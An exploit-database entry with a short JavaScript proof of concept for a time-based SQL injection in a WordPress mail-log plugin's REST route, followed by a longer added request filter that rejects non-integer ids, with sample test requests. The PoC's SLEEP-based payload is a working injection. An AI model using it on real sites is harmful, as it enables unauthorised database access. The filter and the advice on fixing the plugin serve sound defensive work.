## https://sploitus.com/exploit?id=WPEX-ID:32A23D0D-7ECE-4870-A99D-F3F344BE2D67
Run the following within any page on the site. Notice that the request is delayed by the SLEEP call in the injected SQL.
```js
var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();
await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {
  method: 'POST',
  headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce},
  body: 'id=(SELECT IF (1=1,SLEEP(10),1))&to_email=send@example.com'
})).text();
```
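
A request filter for the route used above, as an added example that is not part of the original page or the plugin's code: it rejects requests whose `id` is not a plain integer. It assumes `id` is meant to be a numeric log identifier and that parameters arrive in the query string or a form-encoded body; `inspectSendMailRequest` and the constants are hypothetical names.

```javascript
// Added example: filter for the REST route named in the PoC above.
// Assumption (not stated on the page): `id` is a numeric log identifier.
const TARGET_PATH = '/wp-json/wml/v1/wml_logs/send_mail';
const MAX_ID_DIGITS = 18; // stays inside a signed 64-bit integer column

function inspectSendMailRequest(method, url, body) {
  const reasons = [];
  const q = url.indexOf('?');
  const rawPath = q === -1 ? url : url.slice(0, q);
  const query = q === -1 ? '' : url.slice(q + 1);
  const route = rawPath.replace(/\/+$/, ''); // tolerate a trailing slash
  if (method.toUpperCase() !== 'POST' || route !== TARGET_PATH) {
    return { inScope: false, allowed: true, reasons };
  }
  // Parameters can arrive in the query string or the body, so check both.
  // URLSearchParams decodes %xx and '+', so encoded values are seen in clear.
  const ids = [
    ...new URLSearchParams(query).getAll('id'),
    ...new URLSearchParams(body).getAll('id'),
  ];
  if (ids.length === 0) reasons.push('id missing');
  if (ids.length > 1) reasons.push('id repeated');
  for (const value of ids) {
    if (!/^[0-9]+$/.test(value)) reasons.push('id is not a plain integer');
    else if (value.length > MAX_ID_DIGITS) reasons.push('id too long');
  }
  return { inScope: true, allowed: reasons.length === 0, reasons };
}

// Constructed sample requests; the second body is the one shown in the PoC.
const samples = [
  ['POST', TARGET_PATH, 'id=42&to_email=send@example.com'],
  ['POST', TARGET_PATH, 'id=(SELECT IF (1=1,SLEEP(10),1))&to_email=send@example.com'],
  ['POST', TARGET_PATH, 'id=7&id=8&to_email=send@example.com'],
  ['POST', TARGET_PATH + '?id=1x', 'to_email=send@example.com'],
  ['GET', '/wp-json/wp/v2/posts', ''],
];
for (const [method, url, body] of samples) {
  console.log(method, url, JSON.stringify(inspectSendMailRequest(method, url, body)));
}
```

A filter like this only narrows exposure in front of the endpoint; the fix belongs in the plugin's query, which should bind `id` as an integer parameter.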